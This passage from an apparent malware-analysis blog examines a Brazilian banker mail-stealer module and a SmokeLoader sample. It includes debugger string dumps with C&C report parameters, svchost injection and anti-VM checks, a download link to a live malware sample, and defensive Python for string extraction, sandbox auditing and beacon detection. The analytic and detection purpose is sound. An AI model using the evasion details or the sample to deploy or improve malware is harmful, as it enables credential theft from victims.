<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Login .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 User Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 Server</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP Server</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Nome .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">2l3oþ%HROM€˜þ-‚ŽD</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Login .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 User Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Senha .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">POP3 Server</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP Server</span><br />
<br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">This module is responsible for stealing POP3 and IMAP account data.</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnoz3lfcSRvlTlbYXYOCr88rbfL5o9pBKjMZ5L6k4uSWbjwT9atgAiSO_2tQgpPDUwR7-O0XwbulECH0GUVDZ8eEWtqt16L-nJJClx3UEcMXfvpzmwncCreJVbQJIg6nJsDsi06zEk0HY/s1600/mail-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnoz3lfcSRvlTlbYXYOCr88rbfL5o9pBKjMZ5L6k4uSWbjwT9atgAiSO_2tQgpPDUwR7-O0XwbulECH0GUVDZ8eEWtqt16L-nJJClx3UEcMXfvpzmwncCreJVbQJIg6nJsDsi06zEk0HY/s1600/mail-b.jpg" height="640" width="432" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWi4EWrhdaXknW2dzu4KcAF64RQ6_wllOPt0VAx2sxyeub_sRZcDZq_6wrUJpzBb2MOjLTY_5G9u1k4hJfwTA9kNFY8D7D4OBax3aomfb22eFYSs5YMz2xTOJ8CUdnkPdkF0lkwL153_0/s1600/pop3-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWi4EWrhdaXknW2dzu4KcAF64RQ6_wllOPt0VAx2sxyeub_sRZcDZq_6wrUJpzBb2MOjLTY_5G9u1k4hJfwTA9kNFY8D7D4OBax3aomfb22eFYSs5YMz2xTOJ8CUdnkPdkF0lkwL153_0/s1600/pop3-b.jpg" height="640" width="400" /></a></div>
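<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">The string dumps above (the downloader module's 'CodigoBarra' / 'op=bolas' strings and the 6.txt mail-stealer strings) are the kind of output a debugger's string view produces. As an added example, and not code from this post or from the malware, here is a small Python triage helper that extracts ASCII and UTF-16LE strings with their addresses in the same layout, and checks a dumped buffer against the indicator strings quoted on this page. The byte buffer it runs on is constructed for the demo; only the indicator strings come from the dumps above.</span></div>

```python
import re

# Indicator strings copied from the string dumps in this post (downloader
# module and 6.txt). The sample buffer below is constructed for the demo.
BOLETO_INDICATORS = [
    b"CodigoBarra", b"codbar", b"op=bolas", b"op=fc", b"sit=", b"L-O-O-K",
    b"Fimsmtp", b"POP3 User Name", b"POP3 Server", b"SMTP Server",
    b"\\Software\\Microsoft\\Internet Account Manager\\Accounts",
]

# A run of at least four printable ASCII bytes ...
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
# ... or of at least four printable ASCII characters encoded as UTF-16LE
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def extract_strings(buf: bytes, base: int = 0):
    """Return (address, kind, text) tuples in address order, the way a
    debugger's string view lists <ansistring> and <widestring> hits."""
    found = []
    for m in ASCII_RE.finditer(buf):
        found.append((base + m.start(), "ansistring", m.group().decode("ascii")))
    for m in WIDE_RE.finditer(buf):
        found.append((base + m.start(), "widestring", m.group().decode("utf-16-le")))
    found.sort()
    return found


def format_line(addr: int, kind: str, text: str) -> str:
    """Render one hit in the same layout as the dumps in the post."""
    return f" {addr:08X} <{kind}> '{text}'"


def match_indicators(buf: bytes, indicators=BOLETO_INDICATORS):
    """Indicator strings present in buf, either as ASCII or as UTF-16LE."""
    hits = []
    for ind in indicators:
        wide = ind.decode("ascii").encode("utf-16-le")
        if ind in buf or wide in buf:
            hits.append(ind.decode("ascii"))
    return hits


# Constructed byte buffer standing in for a dumped memory region; it is not
# taken from the real sample.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 8            # header-like bytes, too short to count
    + b"CodigoBarra\x00"                    # offset 12
    + b"\x01\x02"
    + b"op=bolas\x00"                       # offset 26
    + b"\xff\xff"
    + "sit=".encode("utf-16-le")            # offset 37, wide string
    + b"\x00\x00"
    + b"POP3 Server\x00"                    # offset 47
    + b"xy\x00"                             # too short to count
)

if __name__ == "__main__":
    for addr, kind, text in extract_strings(SAMPLE, base=0x400000):
        print(format_line(addr, kind, text))
    print("indicators:", match_indicators(SAMPLE))
```

<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">Both encodings are searched because the dumps above show the same family mixing <ansistring> and <widestring> values ('sit=' only appears in the wide form). Four characters is the usual minimum for a strings pass; shorter runs such as 'xeq' or 'al' are deliberately dropped, which is why the dumps above list them separately.</span></div>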
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Sample: https://www.dropbox.com/s/lter3agprah9pcl/banker-02-08-14.rar</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">That's all for now.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2014</span></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">SmokeLoader</span></b> <span style="font-family: Arial, Helvetica, sans-serif;">(@Dkavalanche, 2014-07-18)</span><br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Thanks to my friend <a href="http://%E2%80%8F@rfb_/">Raul</a>, today I bring you this SmokeLoader sample, which is distributed as a fake Amazon.com purchase order.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT9bCnqm1tjXXPGCHjurFk8wufpc0ZOqEp1LqJiiSnN5mQWeh67Qe-U2NjlDvS5ZfwaQLrnVcRFCHzeW8pKgZ-VYlpyUgVWZJFltolrezSxoZbab9fvmxnMwkNCadpxomdVWKFcnty58Y/s1600/fake.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgT9bCnqm1tjXXPGCHjurFk8wufpc0ZOqEp1LqJiiSnN5mQWeh67Qe-U2NjlDvS5ZfwaQLrnVcRFCHzeW8pKgZ-VYlpyUgVWZJFltolrezSxoZbab9fvmxnMwkNCadpxomdVWKFcnty58Y/s1600/fake.jpg" height="290" width="320" /></a></div>
<br />
<br />
<br />
Analysis on V.T.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrWd4oDh2xcO2dXS2Xn94XOqHu7yi8_sLy6ng4KqSAKv4-4ONK6jJOC28Zn4y_-J311CmOSiF47Q6aQifX9WMZUdoGUWnAPuM17RZMBTACTSh_XEFAduYehRV1Ct9xIOYNrLMvqIfvz_g/s1600/vt1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrWd4oDh2xcO2dXS2Xn94XOqHu7yi8_sLy6ng4KqSAKv4-4ONK6jJOC28Zn4y_-J311CmOSiF47Q6aQifX9WMZUdoGUWnAPuM17RZMBTACTSh_XEFAduYehRV1Ct9xIOYNrLMvqIfvz_g/s1600/vt1.jpg" height="138" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A basic crypter layer written in Visual Basic</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuPhbkC86PgyIaALHKyAoVRL6hVg1KnZUblCxSTsS4Pwd3MCFu8hdwKiLNtuOhi0iWFoWNtISBW3x-IHxnRWao52aOo53eTW1eIfdGlLyWN9bHEYvcgxe9MsIY3iAd9qFFu0IqelKNGiY/s1600/01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuPhbkC86PgyIaALHKyAoVRL6hVg1KnZUblCxSTsS4Pwd3MCFu8hdwKiLNtuOhi0iWFoWNtISBW3x-IHxnRWao52aOo53eTW1eIfdGlLyWN9bHEYvcgxe9MsIY3iAd9qFFu0IqelKNGiY/s1600/01.png" height="203" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-b9JefKXi8JvG0pmZNLw5eyn5JUY7GdEsUO01s5Vfn2FsvwLwDqpBson170mxXzMFm4R7Cvnmw8zzhTVsucSgkjGXMBQYXmqJYG5YIdnIqMe8TEAVOhApqGYgdyuCWAlSDfnY3uPJtM/s1600/02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs-b9JefKXi8JvG0pmZNLw5eyn5JUY7GdEsUO01s5Vfn2FsvwLwDqpBson170mxXzMFm4R7Cvnmw8zzhTVsucSgkjGXMBQYXmqJYG5YIdnIqMe8TEAVOhApqGYgdyuCWAlSDfnY3uPJtM/s1600/02.png" height="209" width="320" /></a></div>
<br />
Without the crypter:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyM_ZpMjaXtPwzi2SH7SakjACD2uMuVxFyTXG32jtniAtjSOQcRxRdsxD3PULFUPFzzGBA_x1i9DXKR059qPsA4MA3-LC72wT3Mq3ytFHLSHAgmsccwxdd4keHFejr5w0KLCY-mkg8LnU/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyM_ZpMjaXtPwzi2SH7SakjACD2uMuVxFyTXG32jtniAtjSOQcRxRdsxD3PULFUPFzzGBA_x1i9DXKR059qPsA4MA3-LC72wT3Mq3ytFHLSHAgmsccwxdd4keHFejr5w0KLCY-mkg8LnU/s1600/vt2.jpg" height="113" width="400" /></a></div>
<br />
<br />
Interesting strings<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E126C ASCII "&file=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E1274 ASCII "&run=ok",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E127C ASCII "&run=fail",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E1288 ASCII "&sel=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E1290 ASCII "&ver=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E1298 ASCII "&bits=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12A0 ASCII "&doubles=1",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12AC ASCII "&personal=ok",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12BC ASCII "&removed=ok",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12C8 ASCII "&admin=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12D0 ASCII "&hash=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12D8 ASCII "&r=",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E12DC ASCII "Software",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2798 ASCII "svchost.exe",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2998 SUB EAX,Smoke.001E2740 ASCII "`è$"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2AB6 PUSH Smoke.001E2E3C ASCII "Shell_TrayWnd"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2C03 PUSH Smoke.001E2E4C ASCII "s2k14"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2C69 PUSH Smoke.001E2E4C ASCII "s2k14"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2D36 PUSH Smoke.001E2E54 ASCII "svchost.exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E2E86 PUSH 0x10000 UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E35E2 PUSH Smoke.001E3A14 ASCII "System"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E38CC PUSH Smoke.001E3A1C ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E38DC PUSH Smoke.001E3A1C ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E39A8 PUSH Smoke.001E3A1C ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3A14 ASCII "System",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3A1C ASCII "advapi32.dll",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3A5D MOV EDX,Smoke.001E3D90 ASCII "Location:"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3D90 ASCII "Location:",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3E1F MOV EDX,Smoke.001E424C ASCII "Smk"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3E5E MOV EDX,Smoke.001E4250 ASCII "plugin_size"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3E9C MOV EDX,Smoke.001E425C ASCII "|:|"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3EED PUSH 0xFA000 UNICODE "september"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3FBB PUSH Smoke.001E4260 ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E3FCB PUSH Smoke.001E4260 ASCII "advapi32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4019 PUSH Smoke.001E4270 ASCII "%s%s%c"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4084 PUSH Smoke.001E4278 ASCII "%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4137 PUSH Smoke.001E4278 ASCII "%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E41C0 PUSH Smoke.001E4280 ASCII "%s%s%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E424C ASCII "Smk",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4478 ASCII "%s%s%s%s%s",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4586 MOV EDX,Smoke.001E45E4 ASCII "Work"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E45E4 ASCII "Work",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E464A PUSH 0xFA000 UNICODE "september"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4792 PUSH Smoke.001E4858 ASCII "FF"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E479C PUSH Smoke.001E485C ASCII "%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E47E5 PUSH Smoke.001E4864 ASCII "%s%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4858 ASCII "FF",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E485C ASCII "%s%s",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4864 ASCII "%s%s%s",0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E489F MOV EDX,Smoke.001E49E4 ASCII "sample"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E48CC PUSH Smoke.001E49EC ASCII "C:\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E4919 PUSH Smoke.001E49F0 ASCII "System\CurrentControlSet\Services\Disk\Enum"</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">001E5088 DD Smoke.001E1024 UNICODE "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E508C DD Smoke.001E1030 UNICODE "%s%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E5090 DD Smoke.001E103C UNICODE "regsvr32 /s %s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E5094 DD Smoke.001E105C UNICODE "%s\%s.lnk"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E5098 DD Smoke.001E1070 UNICODE "%APPDATA%"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E509C DD Smoke.001E1084 UNICODE "%TEMP%"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50A0 DD Smoke.001E1094 UNICODE ".exe"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50A4 DD Smoke.001E10A0 UNICODE ".dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50A8 DD Smoke.001E10AC UNICODE "/c start %s && exit"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50AC DD Smoke.001E10D4 ASCII "user32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50B0 DD Smoke.001E10DC ASCII "shell32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50B4 DD Smoke.001E10E4 ASCII "advapi32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50B8 DD Smoke.001E10F0 ASCII "crypt32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50BC DD Smoke.001E10F8 ASCII "ws2_32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50C0 DD Smoke.001E1100 ASCII "urlmon"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50C4 DD Smoke.001E1108 ASCII "ole32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50C8 DD Smoke.001E1110 ASCII "HelpLink"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50CC DD Smoke.001E111C ASCII "URLInfoAbout"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50D0 DD Smoke.001E112C ASCII "sbiedll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50D4 DD Smoke.001E1134 ASCII "dbghelp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50D8 DD Smoke.001E113C ASCII "qemu"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50DC DD Smoke.001E1144 ASCII "virtual"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E0 DD Smoke.001E114C ASCII "vmware"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E4 DD Smoke.001E1154 ASCII "xen"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E8 DD Smoke.001E1158 ASCII ":Zone.Identifier"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50EC DD Smoke.001E116C ASCII "Mozilla/4.0"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50F0 DD Smoke.001E1178 ASCII "cmd=getload&login="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50F4 DD Smoke.001E118C ASCII "http://www.msn.com/"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50F8 DD Smoke.001E11A0 ASCII "GET /%s HTTP/1.1</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">This threat injects itself into an svchost.exe process</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">001E2798 ASCII "svchost.exe",0</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">It has protection against running inside virtual machines</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50D8 DD Smoke.001E113C ASCII "qemu"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50DC DD Smoke.001E1144 ASCII "virtual"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E0 DD Smoke.001E114C ASCII "vmware"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E4 DD Smoke.001E1154 ASCII "xen"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
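<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">The four words above are the whole anti-VM vocabulary of this sample, and the dump also carries the registry path "System\CurrentControlSet\Services\Disk\Enum". Whether the sample compares the words against that key is my assumption (the post lists both but does not link them); the key is a common place for such checks because Windows stores the disk's PnP device ID there, vendor name included. As an added example, not code from the post, the following Python audits a list of Disk\Enum values the way an analyst would before trusting a sandbox: it parses the device ID into bus/model/instance and reports which of the four markers a case-insensitive substring check would find. The three values are constructed in the Windows layout, not copied from a real host.</span></div>

```python
# VM-related words from the SmokeLoader string dump in this post.
VM_MARKERS = ("qemu", "virtual", "vmware", "xen")


def parse_disk_enum_value(value: str):
    """Split a PnP device instance ID, as stored under
    HKLM\\System\\CurrentControlSet\\Services\\Disk\\Enum, into
    (bus, model, instance). Example shape (constructed):
    'IDE\\DiskVMware_Virtual_IDE_Hard_Drive___________00000001\\5&1c3a0b2e&0&0.0.0'."""
    parts = value.split("\\", 2)
    if len(parts) < 2:
        return None
    bus, device = parts[0], parts[1]
    instance = parts[2] if len(parts) > 2 else ""
    model = device[4:] if device.upper().startswith("DISK") else device
    # Windows pads the vendor/model fields with underscores; collapse them.
    model = " ".join(model.rstrip("_").replace("_", " ").split())
    return bus, model, instance


def vm_markers_in(value: str):
    """Markers a case-insensitive substring check would find in value."""
    low = value.lower()
    return [m for m in VM_MARKERS if m in low]


def audit_disk_enum(values):
    """(model, markers) per value; a non-empty marker list means an analysis
    VM with that disk would be fingerprinted by a check like this one."""
    report = []
    for v in values:
        parsed = parse_disk_enum_value(v)
        model = parsed[1] if parsed else v
        report.append((model, vm_markers_in(v)))
    return report


# Constructed values in the Disk\Enum layout (not copied from a real host).
SAMPLE_ENUM = [
    "IDE\\DiskVMware_Virtual_IDE_Hard_Drive___________00000001\\5&1c3a0b2e&0&0.0.0",
    "IDE\\DiskQEMU_HARDDISK___________________________2.5+____\\5&2f7e4a1d&0&0.0.0",
    "IDE\\DiskST3500418AS_____________________________CC38____\\5&3a9b0c6e&0&0.0.0",
]

if __name__ == "__main__":
    for model, markers in audit_disk_enum(SAMPLE_ENUM):
        status = "FLAGGED " + ",".join(markers) if markers else "clean"
        print(f"{model:45} {status}")
```

<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">The third value, a physical Seagate disk, is the only one that passes. A sandbox whose disk enumerates with a hypervisor vendor string will never reach the C&C stage of this sample, so the check is worth running before drawing conclusions from a quiet dynamic run.</span></div>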
<span style="font-family: Courier New, Courier, monospace;">Report to the C&C</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">"cmd=getload&login="</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
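<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">The "cmd=getload&login=" string, the "&file=", "&run=ok", "&sel=", "&ver=", "&bits=" ... report fragments and the "Mozilla/4.0" user agent from the dump above are enough to write a detection over captured HTTP traffic. As an added example, not code from the post, here is Python that runs that logic over sample request records. The tab-separated capture format (timestamp, source, method, URL, User-Agent, body) is hypothetical, and every line is constructed; the post does not show whether the real sample sends these parameters in the URL or in a POST body, so the check merges both.</span></div>

```python
from urllib.parse import parse_qsl, urlsplit

# "&key=" report fragments from the SmokeLoader string dump in this post.
REPORT_KEYS = {"login", "file", "run", "sel", "ver", "bits", "doubles",
               "personal", "removed", "admin", "hash", "r"}
LEGACY_UA = "Mozilla/4.0"


def parse_capture_line(line: str):
    """Constructed tab-separated capture format (hypothetical, not a real
    proxy log): timestamp, source IP, method, URL, User-Agent, body."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 6:
        return None
    ts, src, method, url, ua, body = fields
    return {"ts": ts, "src": src, "method": method, "url": url, "ua": ua, "body": body}


def beacon_params(rec):
    """key=value pairs from the URL query and from the body, merged."""
    params = dict(parse_qsl(urlsplit(rec["url"]).query, keep_blank_values=True))
    if rec["body"]:
        params.update(parse_qsl(rec["body"], keep_blank_values=True))
    return params


def classify(rec):
    """Reasons to flag the request; an empty list means nothing matched."""
    params = beacon_params(rec)
    reasons = []
    # Treat "cmd=getload&login=" as one unit: cmd=getload alone is too generic.
    if params.get("cmd") == "getload" and "login" in params:
        reasons.append("getload beacon")
    known = sorted(REPORT_KEYS.intersection(params))
    if len(known) >= 3:
        reasons.append("report keys: " + ",".join(known))
    # The UA string is far too common to flag by itself; it only corroborates.
    if reasons and rec["ua"].startswith(LEGACY_UA):
        reasons.append("legacy UA")
    return reasons


def detect(lines):
    """(timestamp, source, reasons) for every flagged line."""
    flagged = []
    for line in lines:
        rec = parse_capture_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            flagged.append((rec["ts"], rec["src"], reasons))
    return flagged


# Constructed capture lines (no real hosts; example.invalid is a reserved name).
SAMPLE_CAPTURE = [
    "2014-07-18T12:05:01\t10.0.0.5\tPOST\thttp://example.invalid/\tMozilla/4.0\tcmd=getload&login=ab12cd34",
    "2014-07-18T12:05:09\t10.0.0.5\tPOST\thttp://example.invalid/\tMozilla/4.0\t"
    "cmd=getload&login=ab12cd34&file=1&run=ok&sel=2&ver=2014&bits=32&admin=1",
    "2014-07-18T12:05:10\t10.0.0.7\tGET\thttp://www.msn.com/\tMozilla/5.0\t",
    "2014-07-18T12:05:12\t10.0.0.9\tGET\thttp://example.invalid/app?cmd=view&login=bob\tMozilla/5.0\t",
]

if __name__ == "__main__":
    for ts, src, reasons in detect(SAMPLE_CAPTURE):
        print(ts, src, "; ".join(reasons))
```

<div class="separator" style="clear: both; text-align: left;"><span style="font-family: Arial, Helvetica, sans-serif;">The third line is the www.msn.com request also present in the dump (likely a connectivity check) and the fourth is an ordinary web app using cmd= and login=; neither is flagged, because the rule requires the exact getload/login pair or at least three of the report keys together. Tune the threshold to your traffic, but keep the user agent as a corroborating signal only.</span></div>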
<span style="font-family: Arial, Helvetica, sans-serif;">In the dynamic test, the bot downloads another executable module responsible for stealing sensitive information from the victim (a password stealer)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
